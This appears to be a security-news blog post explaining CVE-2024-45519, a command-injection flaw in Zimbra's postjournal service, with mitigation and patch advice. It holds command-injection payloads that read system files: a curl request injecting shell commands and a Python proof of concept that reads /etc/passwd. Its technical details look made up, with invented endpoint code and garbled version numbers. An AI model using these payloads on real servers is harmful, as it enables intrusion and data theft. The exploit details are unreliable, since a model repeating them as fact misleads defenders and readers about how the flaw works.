CVE CyberSecurity Database News

CVE-2024-45519 - How Unauthenticated Users Can Exploit Zimbra’s postjournal Service

Poster -

Zimbra Collaboration Suite (ZCS) is widely used for business email and collaboration. It serves millions of users globally. However, in early 2024, a serious vulnerability was discovered in its postjournal service—tracked as CVE-2024-45519. This vulnerability potentially lets anyone on the internet – even without logging in – run commands on Zimbra servers. That’s as bad as it sounds.

If you run Zimbra, especially versions below 8.8.15 Patch 46, 9.. Patch 41, 10..9, or 10.1.1, you are at risk and should read on and patch ASAP.

What is the postjournal Service in Zimbra?

The postjournal service is part of Zimbra’s mail-processing system. It’s often used for compliance—storing or auditing copies of sent/received email. Because it has deep access to mail flow, any bug here spells trouble.

Vulnerability: Unauthenticated command execution via postjournal endpoint

- CVSS Score: High/critical (at time of writing)

What’s the Risk?

This bug lets *anyone* send requests to a specific endpoint on the Zimbra server and get it to execute system commands—as the Zimbra user. Attackers could:

The Issue

The vulnerable endpoint fails to properly check if the user is authenticated before allowing access to its functionality. Worse: it processes user-supplied data in a way that allows for command execution.

Internally, code mishandling looks like this (simplified for demonstration)

def postjournal_endpoint(request):
    # No check for authentication!
    user_input = request.get('journal_entry')
    os.system(f"echo '{user_input}' >> /opt/zimbra/journal.log")

Here, whatever gets posted to the endpoint (as journal_entry) is sent directly into an operating system shell command, giving attackers free rein.

A curl command to exploit might look like

curl -X POST https://mail.yourcompany.com/service/extension/postjournal \
     -d "journal_entry=ANYTHING; whoami; id; uname -a"

The server will run whoami, id, and uname -a as the Zimbra process user, and the attacker can view the output in server logs or possibly in a crafted response.

Real-World PoC (Proof-of-Concept)

*Warning: Do not run this on production or without authorization!*

import requests

target = "https://mail.target.com/service/extension/postjournal";
malicious_payload = "test; cat /etc/passwd"

requests.post(target, data={'journal_entry': malicious_payload})

Attackers can use this payload to retrieve things like /etc/passwd, escalate to a full reverse shell, or deploy malware.

Look for Unusual Requests:

Monitor logs for unauthenticated POST requests to /service/extension/postjournal.

Check for Abnormal Activity:

Sudden spikes in CPU usage, new processes, or unexpected files (especially in /tmp or /opt/zimbra).

How To Fix

Patch immediately!
- 8.8.15 Patch 46 Release Notes
- 9.. Patch 41 Release Notes
- Version 10 Release Notes

If you can’t patch immediately

- Use a reverse proxy to block access to /service/extension/postjournal from external IPs.

External References

- NIST NVD Entry for CVE-2024-45519
- Zimbra's Security Advisory
- Rapid7 Analysis *(if available)*
- Original Patch Release Notes

Conclusion

CVE-2024-45519 is critical and easy to exploit—a dangerous mix. If attackers reach your Zimbra postjournal endpoint, they can execute commands at will. Patch now, review your logs, restrict admin interfaces, and monitor your systems closely.

Stay safe, stay patched.

*If you found this useful, share with others in your IT community—and check your Zimbra servers today.*

Timeline

Published on: 10/02/2024 22:15:02 UTC
Last modified on: 10/04/2024 13:34:19 UTC